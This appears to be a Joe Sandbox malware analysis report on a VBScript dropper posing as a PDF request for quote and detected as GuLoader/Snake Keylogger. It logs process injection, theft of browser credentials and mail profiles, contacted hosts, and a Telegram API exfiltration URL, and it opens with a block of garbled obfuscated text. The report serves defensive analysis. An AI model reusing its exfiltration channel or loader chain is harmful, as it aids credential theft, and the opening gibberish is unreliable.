dyokeaelachrlkie,egarbejgtergie frazl irrusinquieart is.orma.maghissm gepindvilu affisaddutlden.(rea i$tr,ckczigzaoudestlkar oe ieclolaspeppelortregnlebaronrnatioo cereikogendpark,) inct ');forbindingers (franarrendes 'hu,ba[ ,nten lasse guiltpedan.inse.senergeh vedrgnistvdivi.iin,rtcungd efortipfun,oo affaicloamncompitepichmbugh ab.rnenbarquanonutg altaeanaerrunpro]arbej: vndg: lumbssparserentec ,nteu semirwigeoi sluktchokiy mu kpgolemrspe cJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000008.00000002.2988377794.00000000242C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: Yara matchFile source: 00000008.00000002.2988377794.00000000243C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000008.00000002.2988377794.00000000242C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              221
              Scripting
              1
              DLL Side-Loading
              2
              Obfuscated Files or Information
              1
              OS Credential Dumping
              1
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution
              1
              DLL Side-Loading
              311
              Process Injection
              1
              Software Packing
              LSASS Memory13
              System Information Discovery
              Remote Desktop Protocol1
              Data from Local System
              3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Command and Scripting Interpreter
              Logon Script (Windows)Logon Script (Windows)1
              DLL Side-Loading
              Security Account Manager11
              Security Software Discovery
              SMB/Windows Admin Shares1
              Email Collection
              11
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell
              Login HookLogin Hook1
              Masquerading
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
              Virtualization/Sandbox Evasion
              LSA Secrets31
              Virtualization/Sandbox Evasion
              SSHKeylogging14
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
              Process Injection
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              System Network Configuration Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1540842 Sample: RFQ_64182MR_PDF.R00.vbs Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 23 reallyfreegeoip.org 2->23 25 api.telegram.org 2->25 27 4 other IPs or domains 2->27 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Multi AV Scanner detection for submitted file 2->43 49 6 other signatures 2->49 8 powershell.exe 15 2->8         started        11 wscript.exe 1 2->11         started        signatures3 45 Tries to detect the country of the analysis system (by using the IP) 23->45 47 Uses the Telegram API (likely for C&C communication) 25->47 process4 signatures5 51 Early bird code injection technique detected 8->51 53 Writes to foreign memory regions 8->53 55 Found suspicious powershell code related to unpacking or dynamic code loading 8->55 57 Queues an APC in another process (thread injection) 8->57 13 msiexec.exe 15 8 8->13         started        17 conhost.exe 8->17         started        59 VBScript performs obfuscated calls to suspicious functions 11->59 61 Suspicious powershell command line found 11->61 63 Wscript starts Powershell (via cmd or directly) 11->63 65 2 other signatures 11->65 19 powershell.exe 14 20 11->19         started        process6 dnsIp7 29 api.telegram.org 149.154.167.220, 443, 49867 TELEGRAMRU United Kingdom 13->29 31 reallyfreegeoip.org 188.114.97.3, 443, 49779, 49790 CLOUDFLARENETUS European Union 13->31 37 2 other IPs or domains 13->37 67 Tries to steal Mail credentials (via file / registry access) 13->67 69 Tries to harvest and steal browser information (history, passwords, etc) 13->69 33 drive.usercontent.google.com 142.250.185.65, 443, 49732, 49747 GOOGLEUS United States 19->33 35 drive.google.com 142.250.185.78, 443, 49730, 49731 GOOGLEUS United States 19->35 71 Found suspicious powershell code related to unpacking or dynamic code loading 19->71 21 conhost.exe 19->21         started        signatures8 process9

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              RFQ_64182MR_PDF.R00.vbs26%ReversingLabsScript.Trojan.GuLoader
              RFQ_64182MR_PDF.R00.vbs25%VirustotalBrowse
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              reallyfreegeoip.org0%VirustotalBrowse
              drive.google.com0%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
              http://checkip.dyndns.org/0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              https://apis.google.com0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              drive.google.com
              142.250.185.78
              truefalseunknown
              drive.usercontent.google.com
              142.250.185.65
              truefalse
                unknown
                reallyfreegeoip.org
                188.114.97.3
                truetrueunknown
                api.telegram.org
                149.154.167.220
                truetrue
                  unknown
                  checkip.dyndns.com
                  193.122.6.168
                  truefalse
                    unknown
                    checkip.dyndns.org
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://reallyfreegeoip.org/xml/173.254.250.71false
                        unknown
                        http://checkip.dyndns.org/false
                        • URL Reputation: safe
                        unknown
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2024/10/2024%20/%2017:25:47%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1951410104.0000026815481000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://drive.usercontent.google.compowershell.exe, 00000001.00000002.1920855418.00000268075FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071C9000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1920855418.0000026805637000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1920855418.0000026805637000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://go.micropowershell.exe, 00000001.00000002.1920855418.000002680686E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://contoso.com/Licensepowershell.exe, 00000001.00000002.1951410104.0000026815481000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://contoso.com/Iconpowershell.exe, 00000001.00000002.1951410104.0000026815481000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://drive.googPpowershell.exe, 00000001.00000002.1920855418.0000026807188000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680752C000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://drive.usercontent.googhpowershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  http://drive.google.compowershell.exe, 00000001.00000002.1920855418.000002680752C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680718D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016msiexec.exe, 00000008.00000002.2990381131.00000000253E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2990381131.000000002553B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2990381131.000000002540C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17msiexec.exe, 00000008.00000002.2990381131.00000000253E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2990381131.000000002553B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2990381131.000000002540C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1920855418.0000026805637000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://www.google.compowershell.exe, 00000001.00000002.1920855418.000002680588E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680718D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.2153541152.0000000004931000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://contoso.com/powershell.exe, 00000001.00000002.1951410104.0000026815481000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1951410104.0000026815481000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://drive.google.compowershell.exe, 00000001.00000002.1920855418.000002680686E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.0000026805637000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680752C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://drive.usercontent.google.compowershell.exe, 00000001.00000002.1920855418.00000268058AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268075FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://aka.ms/pscore68powershell.exe, 00000001.00000002.1920855418.0000026805411000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://apis.google.compowershell.exe, 00000001.00000002.1920855418.000002680588E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680718D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1920855418.0000026805411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2153541152.0000000004931000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            142.250.185.78
                                            drive.google.comUnited States
                                            15169GOOGLEUSfalse
                                            149.154.167.220
                                            api.telegram.orgUnited Kingdom
                                            62041TELEGRAMRUtrue
                                            188.114.97.3
                                            reallyfreegeoip.orgEuropean Union
                                            13335CLOUDFLARENETUStrue
                                            193.122.6.168
                                            checkip.dyndns.comUnited States
                                            31898ORACLE-BMC-31898USfalse
                                            216.58.206.78
                                            unknownUnited States
                                            15169GOOGLEUSfalse
                                            142.250.185.65
                                            drive.usercontent.google.comUnited States
                                            15169GOOGLEUSfalse
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1540842
                                            Start date and time:2024-10-24 08:41:26 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 7m 28s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:10
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:RFQ_64182MR_PDF.R00.vbs
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.expl.evad.winVBS@8/7@6/6
                                            EGA Information:Failed
                                            HCA Information:
                                            • Successful, ratio: 75%
                                            • Number of executed functions: 42
                                            • Number of non-executed functions: 20
                                            Cookbook Comments:
                                            • Found application associated with file extension: .vbs
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target msiexec.exe, PID 5496 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 3300 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 5432 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            TimeTypeDescription
                                            02:42:22API Interceptor131x Sleep call for process: powershell.exe modified
                                            02:43:23API Interceptor47602x Sleep call for process: msiexec.exe modified
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            149.154.167.220Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                              RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                  Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    rRFQNO-N__MERODOPEDIDO106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exeGet hashmaliciousMassLogger RATBrowse
                                                        Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            eFo07GvEf0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              Ziraat Bankasi Swift Mesaji,pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                188.114.97.301YP9Lwum8.exeGet hashmaliciousDCRatBrowse
                                                                • 77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn.php
                                                                PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                • www.freedietbuilder.online/nnla/
                                                                http://onlinecheapflights.net/Get hashmaliciousUnknownBrowse
                                                                • onlinecheapflights.net/
                                                                Technical Datasheet and Specification_PDF.exeGet hashmaliciousUnknownBrowse
                                                                • www.rihanaroly.sbs/othk/?0dk=RykyQ3QZ+r1dqZwhAQupYMuQy26h2PYi8Fyfl3RAfHSVFgYOfXbCDUNV+aNHe22U393WzLygMMdANTa+vksg1hx1LENxGTGsZa2bATkiGgfiS6KvHA==&urk=NXuT
                                                                request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                • www.ergeneescortg.xyz/guou/
                                                                Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousFormBookBrowse
                                                                • www.thetahostthe.top/9r5x/
                                                                http://comodozeropoint.com/updates/1736162964/N1/Team.exeGet hashmaliciousUnknownBrowse
                                                                • comodozeropoint.com/updates/1736162964/N1/Team.exe
                                                                SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exeGet hashmaliciousUnknownBrowse
                                                                • servicetelemetryserver.shop/api/index.php
                                                                SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exeGet hashmaliciousUnknownBrowse
                                                                • servicetelemetryserver.shop/api/index.php
                                                                SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exeGet hashmaliciousUnknownBrowse
                                                                • servicetelemetryserver.shop/api/index.php
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                reallyfreegeoip.orgWBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.96.3
                                                                Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                rRFQNO-N__MERODOPEDIDO106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 188.114.96.3
                                                                Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                rp8s2rxD5lpuQAG.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.97.3
                                                                InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                eFo07GvEf0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.96.3
                                                                Pedido urgente_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                checkip.dyndns.comWBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 132.226.247.73
                                                                Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 132.226.8.169
                                                                rRFQNO-N__MERODOPEDIDO106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 132.226.247.73
                                                                AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 132.226.8.169
                                                                Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 193.122.6.168
